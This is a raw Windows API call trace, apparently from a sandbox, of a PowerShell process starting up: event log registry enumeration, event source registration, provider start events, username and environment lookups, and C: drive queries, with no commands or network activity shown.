	[0740.549] RegOpenKeyExW (in: hKey=0x378, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d428 | out: phkResult=0x26d428*=0x37c) returned 0x0
	[0740.549] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d428 | out: phkResult=0x26d428*=0x0) returned 0x2
	[0740.549] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d428 | out: phkResult=0x26d428*=0x380) returned 0x0
	[0740.549] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d428 | out: phkResult=0x26d428*=0x0) returned 0x2
	[0740.550] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d428 | out: phkResult=0x26d428*=0x384) returned 0x0
	[0740.550] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d428 | out: phkResult=0x26d428*=0x0) returned 0x2
	[0740.550] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d428 | out: phkResult=0x26d428*=0x388) returned 0x0
	[0740.550] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d428 | out: phkResult=0x26d428*=0x0) returned 0x2
	[0740.550] RegOpenKeyExW (in: hKey=0x378, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d428 | out: phkResult=0x26d428*=0x38c) returned 0x0
	[0740.550] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d428 | out: phkResult=0x26d428*=0x0) returned 0x2
	[0740.550] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d428 | out: phkResult=0x26d428*=0x390) returned 0x0
	[0740.550] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d428 | out: phkResult=0x26d428*=0x0) returned 0x2
	[0740.551] RegOpenKeyExW (in: hKey=0x378, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d428 | out: phkResult=0x26d428*=0x394) returned 0x0
	[0740.551] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d428 | out: phkResult=0x26d428*=0x0) returned 0x2
	[0740.551] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d428 | out: phkResult=0x26d428*=0x398) returned 0x0
	[0740.551] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d428 | out: phkResult=0x26d428*=0x39c) returned 0x0
	[0740.551] RegCloseKey (hKey=0x39c) returned 0x0
	[0740.552] RegCloseKey (hKey=0x378) returned 0x0
	[0740.552] RegCloseKey (hKey=0x398) returned 0x0
	[0740.553] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d398 | out: phkResult=0x26d398*=0x398) returned 0x0
	[0740.553] RegQueryInfoKeyW (in: hKey=0x398, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x26d30c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x26d308, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x26d30c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x26d308*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0740.553] CoTaskMemFree (pv=0x0) 
	[0740.553] CoTaskMemAlloc (cb=0x204) returned 0x4469e0
	[0740.553] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x0, lpName=0x4469e0, lpcchName=0x26d398, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x26d398, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0740.554] CoTaskMemFree (pv=0x4469e0) 
	[0740.554] CoTaskMemFree (pv=0x0) 
	[0740.554] CoTaskMemAlloc (cb=0x204) returned 0x4469e0
	[0740.554] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x1, lpName=0x4469e0, lpcchName=0x26d398, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x26d398, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0740.554] CoTaskMemFree (pv=0x4469e0) 
	[0740.554] CoTaskMemFree (pv=0x0) 
	[0740.554] CoTaskMemAlloc (cb=0x204) returned 0x4469e0
	[0740.554] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x2, lpName=0x4469e0, lpcchName=0x26d398, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x26d398, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0740.554] CoTaskMemFree (pv=0x4469e0) 
	[0740.554] CoTaskMemFree (pv=0x0) 
	[0740.554] CoTaskMemAlloc (cb=0x204) returned 0x4469e0
	[0740.554] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x3, lpName=0x4469e0, lpcchName=0x26d398, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x26d398, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0740.555] CoTaskMemFree (pv=0x4469e0) 
	[0740.555] CoTaskMemFree (pv=0x0) 
	[0740.555] CoTaskMemAlloc (cb=0x204) returned 0x4469e0
	[0740.555] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x4, lpName=0x4469e0, lpcchName=0x26d398, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x26d398, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0740.555] CoTaskMemFree (pv=0x4469e0) 
	[0740.555] CoTaskMemFree (pv=0x0) 
	[0740.555] CoTaskMemAlloc (cb=0x204) returned 0x4469e0
	[0740.555] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x5, lpName=0x4469e0, lpcchName=0x26d398, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x26d398, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0740.555] CoTaskMemFree (pv=0x4469e0) 
	[0740.555] CoTaskMemFree (pv=0x0) 
	[0740.555] CoTaskMemAlloc (cb=0x204) returned 0x4469e0
	[0740.555] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x6, lpName=0x4469e0, lpcchName=0x26d398, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x26d398, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0740.555] CoTaskMemFree (pv=0x4469e0) 
	[0740.555] CoTaskMemFree (pv=0x0) 
	[0740.555] CoTaskMemAlloc (cb=0x204) returned 0x4469e0
	[0740.555] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x7, lpName=0x4469e0, lpcchName=0x26d398, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x26d398, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0740.556] CoTaskMemFree (pv=0x4469e0) 
	[0740.556] CoTaskMemFree (pv=0x0) 
	[0740.556] CoTaskMemAlloc (cb=0x204) returned 0x4469e0
	[0740.556] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x8, lpName=0x4469e0, lpcchName=0x26d398, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x26d398, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0740.556] CoTaskMemFree (pv=0x4469e0) 
	[0740.556] CoTaskMemFree (pv=0x0) 
	[0740.556] RegOpenKeyExW (in: hKey=0x398, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d3f8 | out: phkResult=0x26d3f8*=0x378) returned 0x0
	[0740.556] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d3f8 | out: phkResult=0x26d3f8*=0x0) returned 0x2
	[0740.556] RegOpenKeyExW (in: hKey=0x398, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d3f8 | out: phkResult=0x26d3f8*=0x39c) returned 0x0
	[0740.556] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d3f8 | out: phkResult=0x26d3f8*=0x0) returned 0x2
	[0740.556] RegOpenKeyExW (in: hKey=0x398, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d3f8 | out: phkResult=0x26d3f8*=0x3a0) returned 0x0
	[0740.557] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d3f8 | out: phkResult=0x26d3f8*=0x0) returned 0x2
	[0740.557] RegOpenKeyExW (in: hKey=0x398, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d3f8 | out: phkResult=0x26d3f8*=0x3a4) returned 0x0
	[0740.557] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d3f8 | out: phkResult=0x26d3f8*=0x0) returned 0x2
	[0740.557] RegOpenKeyExW (in: hKey=0x398, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d3f8 | out: phkResult=0x26d3f8*=0x3a8) returned 0x0
	[0740.557] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d3f8 | out: phkResult=0x26d3f8*=0x0) returned 0x2
	[0740.557] RegOpenKeyExW (in: hKey=0x398, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d3f8 | out: phkResult=0x26d3f8*=0x3ac) returned 0x0
	[0740.558] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d3f8 | out: phkResult=0x26d3f8*=0x0) returned 0x2
	[0740.558] RegOpenKeyExW (in: hKey=0x398, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d3f8 | out: phkResult=0x26d3f8*=0x3b0) returned 0x0
	[0740.558] RegOpenKeyExW (in: hKey=0x3b0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d3f8 | out: phkResult=0x26d3f8*=0x0) returned 0x2
	[0740.558] RegOpenKeyExW (in: hKey=0x398, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d3f8 | out: phkResult=0x26d3f8*=0x3b4) returned 0x0
	[0740.558] RegOpenKeyExW (in: hKey=0x3b4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d3f8 | out: phkResult=0x26d3f8*=0x0) returned 0x2
	[0740.558] RegOpenKeyExW (in: hKey=0x398, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d3f8 | out: phkResult=0x26d3f8*=0x3b8) returned 0x0
	[0740.558] RegOpenKeyExW (in: hKey=0x3b8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d3f8 | out: phkResult=0x26d3f8*=0x3bc) returned 0x0
	[0740.558] RegCloseKey (hKey=0x3bc) returned 0x0
	[0740.558] RegCloseKey (hKey=0x398) returned 0x0
	[0740.559] RegCloseKey (hKey=0x3b8) returned 0x0
	[0740.563] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1b970008
	[0740.903] ReportEventW (hEventLog=0x1b970008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e91040*="WSMan", lpRawData=0x2e90db0) returned 1
	[0740.911] CoTaskMemAlloc (cb=0x104) returned 0x4444f0
	[0740.911] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4444f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0740.911] CoTaskMemFree (pv=0x4444f0) 
	[0740.912] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0740.912] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26ce80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0740.913] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26ce80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0740.913] CoTaskMemAlloc (cb=0x804) returned 0x1b8abbe0
	[0740.913] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8abbe0, nSize=0x26d688 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x26d688) returned 0x1
	[0740.914] CoTaskMemFree (pv=0x1b8abbe0) 
	[0740.914] CoTaskMemAlloc (cb=0x204) returned 0x4469e0
	[0740.914] GetUserNameW (in: lpBuffer=0x4469e0, pcbBuffer=0x26d6c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x26d6c8) returned 1
	[0740.914] CoTaskMemFree (pv=0x4469e0) 
	[0740.915] ReportEventW (hEventLog=0x1b970008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e96578*="Alias", lpRawData=0x2e96308) returned 1
	[0740.921] CoTaskMemAlloc (cb=0x104) returned 0x4444f0
	[0740.921] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4444f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0740.922] CoTaskMemFree (pv=0x4444f0) 
	[0740.923] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0740.923] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26ce80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0740.923] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26ce80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0740.924] CoTaskMemAlloc (cb=0x804) returned 0x1b8abbe0
	[0740.924] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8abbe0, nSize=0x26d688 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x26d688) returned 0x1
	[0740.924] CoTaskMemFree (pv=0x1b8abbe0) 
	[0740.924] CoTaskMemAlloc (cb=0x204) returned 0x4469e0
	[0740.924] GetUserNameW (in: lpBuffer=0x4469e0, pcbBuffer=0x26d6c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x26d6c8) returned 1
	[0740.925] CoTaskMemFree (pv=0x4469e0) 
	[0741.048] ReportEventW (hEventLog=0x1b970008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e9bb70*="Environment", lpRawData=0x2e9b900) returned 1
	[0741.065] CoTaskMemAlloc (cb=0x104) returned 0x4444f0
	[0741.065] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4444f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0741.065] CoTaskMemFree (pv=0x4444f0) 
	[0741.067] CoTaskMemAlloc (cb=0x104) returned 0x4444f0
	[0741.067] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x4444f0, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0741.067] CoTaskMemFree (pv=0x4444f0) 
	[0741.067] CoTaskMemAlloc (cb=0x104) returned 0x4444f0
	[0741.067] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x4444f0, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0741.067] CoTaskMemFree (pv=0x4444f0) 
	[0741.067] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x26d230, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d
	[0741.067] SetErrorMode (uMode=0x1) returned 0x1
	[0741.068] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x26d440 | out: lpFileInformation=0x26d440*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0741.068] SetErrorMode (uMode=0x1) returned 0x1
	[0741.069] GetLogicalDrives () returned 0x4
	[0741.070] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x26cfa0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0741.071] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0741.071] SetErrorMode (uMode=0x1) returned 0x1
	[0741.072] CoTaskMemAlloc (cb=0x68) returned 0x1b8900e0
	[0741.072] CoTaskMemAlloc (cb=0x68) returned 0x1b8902a0
	[0741.072] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1b8900e0, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x26d410, lpMaximumComponentLength=0x26d40c, lpFileSystemFlags=0x26d408, lpFileSystemNameBuffer=0x1b8902a0, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x26d410*=0x9c354b42, lpMaximumComponentLength=0x26d40c*=0xff, lpFileSystemFlags=0x26d408*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0741.072] CoTaskMemFree (pv=0x1b8900e0) 
	[0741.073] CoTaskMemFree (pv=0x1b8902a0) 
	[0741.073] SetErrorMode (uMode=0x1) returned 0x1
	[0741.073] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0741.074] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x26d150, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0741.074] SetErrorMode (uMode=0x1) returned 0x1
	[0741.074] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x26d3b0 | out: lpFileInformation=0x26d3b0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0741.074] SetErrorMode (uMode=0x1) returned 0x1
	[0741.074] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x26d150, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0741.075] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x26d000, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0741.075] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0741.075] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x26cf30, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0741.075] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0741.076] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x26cf80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0741.076] SetErrorMode (uMode=0x1) returned 0x1
	[0741.076] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x26d1e0 | out: lpFileInformation=0x26d1e0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0741.076] SetErrorMode (uMode=0x1) returned 0x1
	[0741.077] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x26cf80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0741.077] SetErrorMode (uMode=0x1) returned 0x1
	[0741.077] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x26d1e0 | out: lpFileInformation=0x26d1e0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0741.077] SetErrorMode (uMode=0x1) returned 0x1
	[0741.077] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x26d020, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0741.077] SetErrorMode (uMode=0x1) returned 0x1
	[0741.078] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x26d280 | out: lpFileInformation=0x26d280*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0741.078] SetErrorMode (uMode=0x1) returned 0x1
	[0741.078] CoTaskMemAlloc (cb=0x804) returned 0x1b8abbe0
	[0741.078] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8abbe0, nSize=0x26d688 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x26d688) returned 0x1
	[0741.078] CoTaskMemFree (pv=0x1b8abbe0) 
	[0741.078] CoTaskMemAlloc (cb=0x204) returned 0x4469e0
	[0741.079] GetUserNameW (in: lpBuffer=0x4469e0, pcbBuffer=0x26d6c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x26d6c8) returned 1
	[0741.079] CoTaskMemFree (pv=0x4469e0) 
	[0741.079] ReportEventW (hEventLog=0x1b970008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2ea2c60*="FileSystem", lpRawData=0x2ea29f0) returned 1
	[0741.085] CoTaskMemAlloc (cb=0x104) returned 0x4444f0
	[0741.085] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4444f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0741.085] CoTaskMemFree (pv=0x4444f0) 
	[0741.085] CoTaskMemAlloc (cb=0x804) returned 0x1b8abbe0
	[0741.085] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8abbe0, nSize=0x26d688 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x26d688) returned 0x1
	[0741.086] CoTaskMemFree (pv=0x1b8abbe0) 
	[0741.086] CoTaskMemAlloc (cb=0x204) returned 0x4469e0
	[0741.086] GetUserNameW (in: lpBuffer=0x4469e0, pcbBuffer=0x26d6c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x26d6c8) returned 1
	[0741.086] CoTaskMemFree (pv=0x4469e0) 
	[0741.086] ReportEventW (hEventLog=0x1b970008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2ea84a0*="Function", lpRawData=0x2ea8230) returned 1
	[0741.113] CoTaskMemAlloc (cb=0x104) returned 0x4444f0
	[0741.113] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4444f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0741.113] CoTaskMemFree (pv=0x4444f0) 
	[0741.154] CoTaskMemAlloc (cb=0x804) returned 0x1b8abbe0
	[0741.154] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8abbe0, nSize=0x26d688 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x26d688) returned 0x1
	[0742.520] CoTaskMemFree (pv=0x1b8abbe0) 
	[0742.520] CoTaskMemAlloc (cb=0x204) returned 0x4469e0
	[0742.520] GetUserNameW (in: lpBuffer=0x4469e0, pcbBuffer=0x26d6c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x26d6c8) returned 1
	[0742.520] CoTaskMemFree (pv=0x4469e0) 
	[0742.520] ReportEventW (hEventLog=0x1b970008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2ecacc8*="Registry", lpRawData=0x2ecaa58) returned 1
	[0743.865] CoTaskMemAlloc (cb=0x804) returned 0x1b8abbe0
	[0743.865] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8abbe0, nSize=0x26d688 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x26d688) returned 0x1
	[0743.866] CoTaskMemFree (pv=0x1b8abbe0) 
